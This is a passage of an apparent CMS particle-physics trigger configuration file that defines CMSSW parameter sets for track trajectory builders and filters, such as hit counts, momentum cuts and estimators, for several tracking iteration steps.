ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetLowPtQuadStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetLowPtQuadStepTrajectoryFilter" ) ),
useSameTrajFilter = cms.bool( True ),
maxCand = cms.int32( 4 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
foundHitBonus = cms.double( 10.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( False ),
estimator = cms.string( "hltESPLowPtQuadStepChi2ChargeMeasurementEstimator9" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
seedAs5DHit = cms.bool( False )
)
HLTPSetLowPtQuadStepTrajectoryFilter = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 3 ),
seedPairPenalty = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.075 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 999 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 0 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetHighPtTripletStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetHighPtTripletStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetHighPtTripletStepTrajectoryFilter" ) ),
useSameTrajFilter = cms.bool( True ),
maxCand = cms.int32( 3 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
foundHitBonus = cms.double( 10.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( False ),
estimator = cms.string( "hltESPHighPtTripletStepChi2ChargeMeasurementEstimator30" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
seedAs5DHit = cms.bool( False )
)
HLTPSetHighPtTripletStepTrajectoryFilter = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 3 ),
seedPairPenalty = cms.int32( 5 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.2 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 999 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 0 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetLowPtTripletStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetLowPtTripletStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetLowPtTripletStepTrajectoryFilter" ) ),
useSameTrajFilter = cms.bool( True ),
maxCand = cms.int32( 4 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
foundHitBonus = cms.double( 10.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( False ),
estimator = cms.string( "hltESPLowPtTripletStepChi2ChargeMeasurementEstimator9" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
seedAs5DHit = cms.bool( False )
)
HLTPSetLowPtTripletStepTrajectoryFilter = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 3 ),
seedPairPenalty = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.075 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 999 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 0 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetDetachedQuadStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedQuadStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedQuadStepTrajectoryFilter" ) ),
useSameTrajFilter = cms.bool( True ),
maxCand = cms.int32( 3 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
foundHitBonus = cms.double( 10.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( False ),
estimator = cms.string( "hltESPDetachedQuadStepChi2ChargeMeasurementEstimator9" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
seedAs5DHit = cms.bool( False )
)
HLTPSetDetachedQuadStepTrajectoryFilter = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 3 ),
seedPairPenalty = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.075 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 999 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 0 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetDetachedTripletStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedTripletStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedTripletStepTrajectoryFilter" ) ),
useSameTrajFilter = cms.bool( True ),
maxCand = cms.int32( 3 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
foundHitBonus = cms.double( 10.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( False ),
estimator = cms.string( "hltESPDetachedTripletStepChi2ChargeMeasurementEstimator9" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
seedAs5DHit = cms.bool( False )
)
HLTPSetDetachedTripletStepTrajectoryFilter = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 3 ),
seedPairPenalty = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.075 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 999 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 0 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetMixedTripletStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialForMixedStep" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMixedTripletStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMixedTripletStepTrajectoryFilter" ) ),
useSameTrajFilter = cms.bool( True ),
maxCand = cms.int32( 2 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
foundHitBonus = cms.double( 10.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( False ),
estimator = cms.string( "hltESPMixedTripletStepChi2ChargeMeasurementEstimator16" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialForMixedStepOpposite" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
seedAs5DHit = cms.bool( False )
)
HLTPSetMixedTripletStepTrajectoryFilter = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 3 ),
seedPairPenalty = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.1 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 999 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 1.4 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 9999 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelLessStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelLessStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelLessStepTrajectoryFilter" ) ),
useSameTrajFilter = cms.bool( True ),
maxCand = cms.int32( 2 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
foundHitBonus = cms.double( 10.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( False ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( False ),
estimator = cms.string( "hltESPPixelLessStepChi2ChargeMeasurementEstimator16" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
minNrOfHitsForRebuild = cms.int32( 4 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
seedAs5DHit = cms.bool( False )
)
HLTPSetPixelLessStepTrajectoryFilter = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 4 ),
seedPairPenalty = cms.int32( 1 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.1 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 0 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 9999 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetTobTecStepTrajectoryFilter = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 5 ),
seedPairPenalty = cms.int32( 1 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.1 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 0 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 9999 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetTobTecStepInOutTrajectoryFilter = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 4 ),
seedPairPenalty = cms.int32( 1 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.1 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 0 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 9999 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetTobTecStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetTobTecStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetTobTecStepInOutTrajectoryFilter" ) ),
useSameTrajFilter = cms.bool( False ),
maxCand = cms.int32( 2 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
foundHitBonus = cms.double( 10.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( False ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( False ),
estimator = cms.string( "hltESPTobTecStepChi2ChargeMeasurementEstimator16" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
minNrOfHitsForRebuild = cms.int32( 4 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
seedAs5DHit = cms.bool( False )
)
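# Unlike most builders in this file, the TobTec-step builder sets useSameTrajFilter
# to False, so the outward building uses HLTPSetTobTecStepTrajectoryFilter while the
# in-out (rebuild) pass is governed by the looser HLTPSetTobTecStepInOutTrajectoryFilter
# defined just above (minimum of 4 hits instead of 5).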
HLTPSetGroupedCkfTrajectoryBuilderIterL3ForOI = cms.PSet(
rescaleErrorIfFail = cms.double( 1.0 ),
keepOriginalIfRebuildFails = cms.bool( False ),
lockHits = cms.bool( True ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfTrajectoryFilterIterL3OI" ) ),
maxCand = cms.int32( 5 ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
intermediateCleaning = cms.bool( True ),
bestHitOnly = cms.bool( True ),
deltaEta = cms.double( -1.0 ),
useSeedLayer = cms.bool( False ),
useSameTrajFilter = cms.bool( True ),
MeasurementTrackerName = cms.string( "hltSiStripClusters" ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
lostHitPenalty = cms.double( 30.0 ),
requireSeedHitsInRebuild = cms.bool( False ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorAlong = cms.string( "PropagatorWithMaterial" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
alwaysUseInvalidHits = cms.bool( True ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfTrajectoryFilterIterL3OI" ) ),
foundHitBonus = cms.double( 1000.0 ),
propagatorProximity = cms.string( "SteppingHelixPropagatorAny" ),
updator = cms.string( "hltESPKFUpdator" ),
deltaPhi = cms.double( -1.0 ),
seedAs5DHit = cms.bool( False )
)
HLTIter0IterL3MuonPSetGroupedCkfTrajectoryBuilderIT = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( True ),
lostHitPenalty = cms.double( 1.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter0IterL3MuonGroupedCkfTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterial" ),
minNrOfHitsForRebuild = cms.int32( 2 ),
maxCand = cms.int32( 5 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter0IterL3MuonGroupedCkfTrajectoryFilterIT" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 1000.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTIter0IterL3FromL1MuonGroupedCkfTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.9 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 10.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter0IterL3FromL1MuonPSetGroupedCkfTrajectoryBuilderIT = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( True ),
lostHitPenalty = cms.double( 1.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter0IterL3FromL1MuonGroupedCkfTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterial" ),
minNrOfHitsForRebuild = cms.int32( 2 ),
maxCand = cms.int32( 5 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter0IterL3FromL1MuonGroupedCkfTrajectoryFilterIT" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 1000.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTIter0IterL3MuonGroupedCkfTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.9 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 10.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter2HighPtTkMuPSetTrajectoryBuilderIT = cms.PSet(
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltIter2HighPtTkMuESPMeasurementTracker" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter2HighPtTkMuPSetTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
intermediateCleaning = cms.bool( True ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTIter2IterL3FromL1MuonPSetTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.3 ),
maxConsecLostHits = cms.int32( 3 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
